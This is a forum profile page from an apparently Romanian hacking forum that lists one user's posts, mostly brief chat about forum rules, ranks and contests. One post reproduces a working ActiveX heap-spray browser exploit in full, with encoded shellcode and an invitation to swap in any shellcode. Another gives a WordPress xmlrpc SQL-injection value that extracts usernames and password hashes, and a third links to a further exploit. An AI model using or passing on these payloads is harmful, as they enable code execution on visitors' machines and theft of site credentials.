
kw3rln
Active Members-
Posts
1019 -
Joined
-
Last visited
Everything posted by kw3rln
-
amnc curese getn ooo asau slackwaresa
-
puncte de pe aici: http://rstzone.net/index.php?pagina=bug_reports&cmd=lista si poate un sistem de challengeuri .. experienta se calculeaza dupa un algoritm .. ma mai gandesc la el la activitate se ia numarul de posturi .. cat timp sta pe forum si de alea .. deabia e conceput proiectu
-
incearca asta: http://milw0rm.com/exploits/4052
-
mah citeste regulile! ai nevoie de minim 10 posturi ca sati fie acordat ajutor/cereri ! dupa ce ai vazut ca nu poti posta la ajutor postezi prin alte locuri !
-
<html> <!-- 45 minutes of fuzzing! Great results! very relible, runs calc.exe, replace with shellcode of your choice!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 maybe more vulz! Greetz to: str0ke and shinnai! --> <html> <object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object> <script> shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<800; x++) memory[x] = block + shellcode; var buffer = '\x0a'; while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a'; target.server = buffer; target.initialize(); target.send(); </script> </html> sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111 # milw0rm.com [2007-06-07]
-
frumos .. mersi mult demo: http://demo.yootheme.com/jun07/index.php?yt_option=black&Itemid=47
-
/*El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this->escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $args[2]; $category = $args[3]; $max_results = $args[4]; if(!$this->login_pass_ok($username, $password)) { return($this->error); } // Only set a limit if one was provided. $limit = ""; if(!empty($max_results)) { $limit = "LIMIT {$max_results}"; } $category_suggestions = $wpdb->get_results(" SELECT cat_ID category_id, cat_name category_name FROM {$wpdb->categories} WHERE cat_name LIKE '{$category}%' {$limit} "); return($category_suggestions); } Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio vÃctima. Preparé un peque
-
Forum suspendat la cerere de catre unul dintre administratori => HIENA Pentru detalii, ne poti contacta la [url]http://support.myforum.ro/[/url]
-
dak am face asa atunci majoritatea xss-urilor vor fi puse acolo si gata cu forumul XSS! las ca-i bine asa la titlu domeniul si xss-u in post il gasesti mai usor
-
mai trebe sa stiu ce nume punem la ranguri si le pun
-
am avut sony w850i si acuma am un nokia 8880
-
hai sa mai fie concursu inca 1 sapt ca incepe sa-mi placa
-
[offtopic] cein tu esti anti-rst ? ca apare RST taiat la tine in sigla
-
astept idei .. propuneri ... scripturi pe mail: office@rosecuritygroup.net
-
lol .. saracii 10 ani oricum nu se lasa pan nu se prinde o brigada intreaga
-
am luat versiunea care o puso omu! Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
-
codul: in common.php //if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS') { //---CMS $f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php'; if( !file_exists($f_cms) || !is_file($f_cms) ) require_once(INC_DIR . 'cmses/statelessCMS.php');//free for all users else require_once( $f_cms ); //---end CMS } f_cms ii declarat ! nu-i vurnerabil iar in connection.php nu exista variabila aia :
-
foarte frumos encoded ! nice